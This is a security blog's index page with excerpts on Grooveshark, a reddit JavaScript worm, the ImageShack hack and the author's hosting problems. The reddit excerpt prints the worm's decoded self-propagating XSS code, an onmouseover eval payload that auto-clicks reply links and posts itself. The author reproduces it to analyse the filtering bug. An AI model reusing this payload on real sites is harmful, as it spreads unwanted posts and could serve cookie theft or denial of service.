Being an IT security enthusiast and knowing that most of the websites out there don’t take security seriously, I’m rarely surprised about big websites being compromised.
But this time I have been amazed, not because of a vulnerability, but because the attention Grooveshark gives to it’s users. A security warning for users that aren’t up to date with Adobe Flash, every time you enter the website… image here.
Bravo. It’s an example I would expect others to follow as well.
P.S. they have a great error page when the service is down.
Today when reddit was down for maintenance people kept gathering on the #redditdowntime channel on freenode where under a couple of minutes intriguing things started to happen.
You can read the whole story here (and come back afterwards).
(continue)
As I am writing this a javascript worm is having fun spreading on reddit. For one part we should be happy it only spreads and does not do anything else (you now, like cookie theft). On the other hand, it may be an attempt to DDoS reddit, because I’m suddenly starting to get error pages…
An error occurred while processing your request.
Reference #97.27c37259.1254106488.35b1d0e
The (decoded) code of the worm is the following:
// generate payload/attack vector
// having trouble understanding why this works
z="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";
// and what's with the 9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d ?
// "click" all reply links in page
o=document;
e=o.getElementsByTagName('a');
for(i=0;i<e.length;i++)
if(e[i].innerHTML=='reply')
$(e[i]).click();
// fill with payload
o=document;
e=o.getElementsByTagName('textarea');
for(i=0;i<e.length;i++)
e[i].value=z;
// submit
e=o.getElementsByTagName('button');
for(i=0;i<e.length;i++)
if(e[i].innerHTML=='save'&&e[i].style.display!='none')
$(e[i]).click();
In the meantime of writing the article I tried to look for the invalid filtering in the source code, but as touching for the first time the code had no sense of direction. If someone would be kind enough to enlighten me in which file the code resides I’d be more than happy.
If not, we’ll have an unsolved mystery :)
UPDATE: worm author has happily shared its way of evading the filter.
UPDATE 2: post about the bug on the reddit blog.
As some of you may have noticed, news about ImageShack being hacked has started to circulate today. While I tried to see this for myself, part of the damage has been fixed; I say part because the ImageShack blog still throws database connection errors…
Even if this may have been worse for users who store their images there (myself included), there is more to it than meets the eye.
(continue)
It looks as my online existence was on the peek of doom this month…
At first, my last Hosting Service was hacked and malicious iframes were injected in the website.
Later on, one of my twitter accounts (I’ve got two accounts) was suspended because I had a link to my infected blog.
The current hosting service I use had a hardware failure and a part of my blogs content is gone, RIP.
Apache failed a series of times to work this last week. And I’ve noticed this happens due to cold reboots. Other webservers I tried did not seem to fail in that aspect, but weren’t able to register properly PHP $_SERVER variables, so CodeIgniter wouldn’t work on them.
Actually I could have made CI to work, but I want it to work OOTB (out of the box).
SFTP under Centos/CPanel doesn’t support officialy chroot (if you have set up a similar environment feedback is welcome) so I could browse the root directory of my current hosting service, and had access to more than 100 databases. Problem was fixed by disabling SFTP and now I’m stuck with FTPES, which doesn’t support transfer resume… talk about responsive disclosure.
Posting this, doing a database backup and looking forward for more fail until the end of the month.
p.s. It must be due to my low karma on reddit.
littleboy10@insanesecurity.info
The hosting service had a massive breakdown and huge data loss, and I, in the formal tradition, didn’t do any backups (lesson learned). Luckily I was able to recover a couple of articles from the Google Cache.
So if you’re wondering, that was the reason why your feed filled with a bunch of Insane Security articles.
As you may have seen, in the last couple of days this blog was inactive, or under movement… All this happened due to a possible attack on my last hosting provider. And I said possible because I imagined multiple scenarios in which it could have happened.
(continue)
That’s what many NoScript users have claimed of doing after the recent debate about NoScript circumventing ADBlockPlus for displaying the ads from its own page. One question I kept asking myself: Are these really noscript users?
(continue)
For those of you who don’t use Twitter I should specify that Twitter has long time moved away from “what are you doing” principle and today is more of a base framework (Twitter API) for many new (and innovative?) web applications.
Due to this direction that Twitter is adopting (involuntarily) dozens of web applications have sprung up; from url shortening services to web applications like: WeFollow, TwitterSheep, TwitterTag, TwitVid, YFrog, TwitPic and many more…
(continue)
…which will put a smile on your face. That if you are geeky/nerdy enough for them. Here are my test results. Click on one of the images to take the respective test.
(continue)
